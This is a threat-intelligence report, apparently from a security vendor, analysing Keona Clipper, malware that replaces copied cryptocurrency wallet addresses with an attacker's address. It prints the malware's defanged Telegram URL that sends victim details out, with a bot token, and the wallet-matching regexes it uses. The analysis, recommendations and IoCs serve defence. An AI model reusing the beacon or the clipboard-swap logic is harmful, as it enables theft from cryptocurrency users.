Evasive Malware Targeting Cryptocurrency Users
Clipper malware is a family of malicious programs targeting cryptocurrency users. It is used to hijack the clipboards of any infected systems; the clipboard is the buffer where the copied data is stored for copy-paste operations.
In this type of attack, when the victim copies the cryptocurrency wallet address, the clipper replaces the address in the clipboard with the wallet address provided by the attacker, resulting in the victim’s financial loss.
During our routine threat-hunting exercise, Cyble researchers came across a post advertising a new clipper malware, namely “Keona Clipper.” According to its developers, “the Keona clipper is unique and anonymous software wrapped in a Telegram bot with stealth and anonymity.” Additionally, the malware disguises itself as a system file and sends victim details to a Telegram bot.
The malware can steal BTC, ETH, LTC, XMR, XLM, XRP, NEC, BCH, ZCASH, BNB, DASH, DOGE, USDT TRC20, and ADA coins. The malicious file disguises itself as a system file and performs clipper operation regardless of whether the Telegram bot is running or not. Keona Clipper is priced as shown below:
- $49/month – Starter plan
- $79/2 months – Standard plan (1 free replacement of any wallet)
- $149/3 months – Advanced plan (3 free replacements of any wallet)
Through the course of our research, we have identified over 90 different samples related to the clipper malware since May 2022, indicating that the malware has been widely deployed in recent weeks.
Technical Analysis
The clipper sample Sha256: 8a5757981abcefbc9b76eb234dc2c8398f0542206daa08cac68a3951bcab37fe was taken for analysis. The sample is compiled using .NET and protected by Confuser 1.x.
After unpacking the sample, the malware still uses some obfuscation techniques to evade detection by antivirus products. The below figure shows the obfuscated Main function.
Upon execution, the malware uses Telegram APIs to send the information about victims to its Telegram bot. It then uses the below URL to communicate with the Telegram bot.
The URL contains Telegram’s sendMessage() API along with a message “Произошёл запуск клиппера на компьютере” which translates to “clipper has started on the computer.”
hxxps://api[.]telegram[.]org/bot5336816444:AAFAhYDURZP9DwzoanjR7-8Twcs9p2MyOVA/sendMessage?chat_id=336872404&text=✅ Произошёл запуск клиппера на компьютере: <user name> &parse_mode=Markdown&disable_web_page_preview=True
After sending the victim’s details, the clipper malware gets the below response:
The clipper malware creates persistence by copying itself into different locations and creating startup entries in the registry. Initially, it copies itself into the Administrative Tools folder as csrss.exe.
After this, the clipper malware creates persistence by copying itself into the startup location, as shown below.
The clipper also creates auto-start entries in the registry to ensure the malware runs whenever the system restarts. The image below shows the code used by the malware for creating the auto-start entries.
The malware monitors the victims’ clipboard activity and gets the clipboard text using the Clipboard.GetText() function as shown below.
After getting the clipboard text, the malware gets details of targeted cryptocurrencies and their corresponding regular expressions, which are hardcoded in the malware file.
The malware then runs the regular expression against the clipboard data and identifies the crypto wallet addresses. The below table shows the details of targeted cryptocurrencies and their regular expressions.
| Crypto Currencies | Regular Expression |
| BTC | (?:^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$) |
| eth | (?:^0x[a-fA-F0-9]{40,42}$) |
| xmr | (?:^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$) |
| xlm | (?:^G[0-9a-zA-Z]{55}$) |
| xrp | (?:^r[0-9a-zA-Z]{24,34}$) |
| itc | (?:^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$) |
| NEC | (?:^A[0-9a-zA-Z]{33}$) |
| bch | ^((bitcoincash:)?(q|p)[a-z0-9]{41}) |
| dash | (?:^X[1-9A-HJ-NP-Za-km-z]{33}$) |
| trc20 | (?:^T[A-Za-z1-9]{33}) |
| ADA | (?:^addr[0-9-a-z]{99}) |
| doge | ^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$ |
| Zcash | t1[0-9A-z]{33} |
| bnb | (?:^bnb[0-9-a-z]{39}) |
After identifying the targeted crypto wallet address using a regular expression, the malware replaces it with a wallet address defined by the TA using the SetText() method. The below figure shows the transaction details of this wallet address.
Conclusion
People are investing, trading, and using cryptocurrency at an unprecedented scale, which is only bound to increase. Threat actors are thus constantly looking for new techniques to target crypto wallets.
Attacks like this are gaining popularity with threat actors whose main motivation is financial gain. Clipper malware and other similar malware are mostly dropped into the system using phishing campaigns. Malware such as Keona Clipper can also work as a backdoor into the infected system.
Organizations and individuals should thus continue to follow industry best cybersecurity practices to secure themselves and their firms.
Our Recommendations:
- Before submitting the cryptocurrency wallet information, verify the authenticity source.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs.
- Block URLs that could spread the malware, e.g., Torrent/Warez.
- Monitor the beacon on the network level to block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| Initial Access | T1566 | Phishing |
| Persistence | T1547 | Boot or Logon Autostart Execution |
| Defence Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Collection | T1115 | Clipboard Data |
| Command and Control | T1071 | Application Layer Protocol |
Indicators of Compromise (IoCs):
| Indicators | Indicator type | Description |
| 9239ad089b529bebfd3125d10b2692f7 7e8469c6668731c49730f163118aadb5cd66d115 1d9c1e278c7621cd448d2dc2dfdee4b87c36cc19cbaf67065c31bd42e80e57fe | MD5 SHA-1 SHA-256 | Keona Clipper |
| 2604053e99fdcd1c778e6763292a6420 42bee73a646bc9bd51e3519c1b18895c9be308e9 b7c05f1755bb0c72970bc0c7e0baf74b78682d3b6ba7b20c5828f5f0c933829a | MD5 SHA-1 SHA-256 | Keona Clipper |
| fcd063a698fdbb668cb82d983573e99d 7f62e72089fa1434bbe5d1685efdf2a8b9fa5088 96c21bc7694dfa5abc0abca677a0d0c37d6e0ba9902bc64fbcd40446afcedd97 | MD5 SHA-1 SHA-256 | Keona Clipper |
| d89da2a8ba803734a70c22f404f666af 0b334d85665377666b635d770f81a54e9ccc6123 0cc1b9f4fa23f9053435dc78a6f49ee5f0775d17f418c4500c80528c7e013660 | MD5 SHA-1 SHA-256 | Keona Clipper |
| f60cff89cec8f49d355c2199e110bd62 2a8824f2c2eca4e5d0006c6d2c2bd502b838bc77 d9508a9490420811fb76d8802ecb8fd2ff7ae22a3bfb8db80ca8d7cd8eaf0e4e | MD5 SHA-1 SHA-256 | Keona Clipper |
| 916eb02a393201a22bd63a06bbef8d6a 738febf36e3a38d27fad414892bf9e66e1b29a92 f29a4f4fa1b51d2c9a15e807f106a1bceb4674309b06381a6139c76a08fb543d | MD5 SHA-1 SHA-256 | Keona Clipper |
| d13a3819b3eede1ea8ca373d27bc94b9 35ddea9ea9faa41619c20a9d3b741cacfac910f9 4d74740bea7e62d1dccc19167d7d1b75fde50da7d17b1630b89def3b85edbf07 | MD5 SHA-1 SHA-256 | Keona Clipper |
| 10787899d07e09f86d447d74dbd3856a f4506a11ede7514568fdc22face2a63583f31a09 00c8fb844bf951cf75869c459fb5443c263dc427c4c36756701bce61cb8d26f3 | MD5 SHA-1 SHA-256 | Keona Clipper |
| 1cc578b47a90c69528c93396c821cd4e 30363ff8b289e5e8b90fe8637aaf6fd939378dba 3cb4684da133cc1c9791038c203eaf137e8faff2be91422a859f4cef535eedff | MD5 SHA-1 SHA-256 | Keona Clipper |
| 247741c4fbb5f482a6f0d2e522fbda79 4eb2bd15ec574846202f74d8305a9b52cb6c8361 3aa6d602cc3c91db35da7cadfa361798acde82fef4e3edc6aa551b947dd98217 | MD5 SHA-1 SHA-256 | Keona Clipper |
